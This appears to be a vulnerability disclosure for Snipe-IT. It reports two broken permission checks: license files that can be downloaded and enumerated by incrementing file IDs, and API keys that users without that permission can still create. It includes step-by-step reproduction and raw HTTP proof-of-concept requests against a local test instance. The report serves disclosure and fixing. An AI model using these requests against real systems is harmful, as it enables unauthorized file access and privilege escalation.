# Description
There are two permissions not working correctly: The `Licenses -> View and Modify License Files` & the `Self -> Create API Keys` permission.
## License Files
Files can be uploaded to licenses. There is a permission for users called `View and Modify License Files`. However, this permission is ineffective. A user without this permission is still able to access files uploaded to licenses as long as they have the `View` permission for licenses. Additionally, they can enumerate all uploaded files by simply incrementing the identifier for the file in the URL, since it is a simple counter.
### Proof of Concept
Steps to reproduce:
“`
1. Login as admin
2. Go to Licenses and create a new license with arbitrary values
3. Click on the License, go to File Uploads and Upload any 2-3 PoC files
4. Observe that the download links for the uploaded files are of the form `/licenses//showfile/`. `file_id` increments for each additional file uploaded
5. Go to People and create a new user. Make sure to deny all permissions except for the `Licenses -> View` permission. In particular `View and Modify License Files` is denied, i.e. the user should not be able to view license files
6. Login as the newly created user, click on Licenses and click on the license created earlier. Note that a click on `File Uploads` does nothing
7. The URL should now be `/licenses/`
8. Append `/showfile/3` to the URL and observe that the first uploaded file is downloaded
9. All files can be enumerated by incrementing the `file_id`
“`
PoC Request from User with only `Licenses -> View` Permission:
“`
GET /licenses/1/showfile/3 HTTP/1.1
Host: 127.0.0.1:8000
Connection: close
Cookie: snipeit_session=bFxcGzG8fZAfZvPFivACCT7XN9GXdYRBhrvLgZuh
Content-Length: 2
“`
## API Keys
A user can create API keys to authenticate to API endpoints. There is a permission called `Create API keys`, however, even users without this permission are able to create API keys, thus rendering the permission ineffective.
### Proof of Concept
Steps to reproduce:
“`
1. Login as admin
2. Go to People and Create a new User. Make Sure to deny all permissions. In particular `Self -> Create API keys` is denied, i.e. the user should not be able to create API keys
3. Login as the newly created user
4. Take note of the cookie `snipeit_session` and the `csrf-token` in the HTML head which is set in the response to `/account/view-assets`
5. Make the request to create an API key and observe that an API key is returned
“`
API Creation Request (replace the CSRF Token and session cookie accordingly):
“`
POST /oauth/personal-access-tokens HTTP/1.1
Host: 127.0.0.1:8000
X-CSRF-TOKEN: wqLZMfHIXhA8WdsJLmghGHird8AWlDYb8SeEIAIp
Content-Type: application/json;charset=utf-8
Connection: close
Cookie: snipeit_session=CAwxBX0UfnzSh4GD2mIASL0Fp2eoUegXBxOWRN3d
Content-Length: 38
{“name”:”asd”,”scopes”:[],”errors”:[]}
“`
The created API key is valid although the user does not have the permission to create API keys.Read More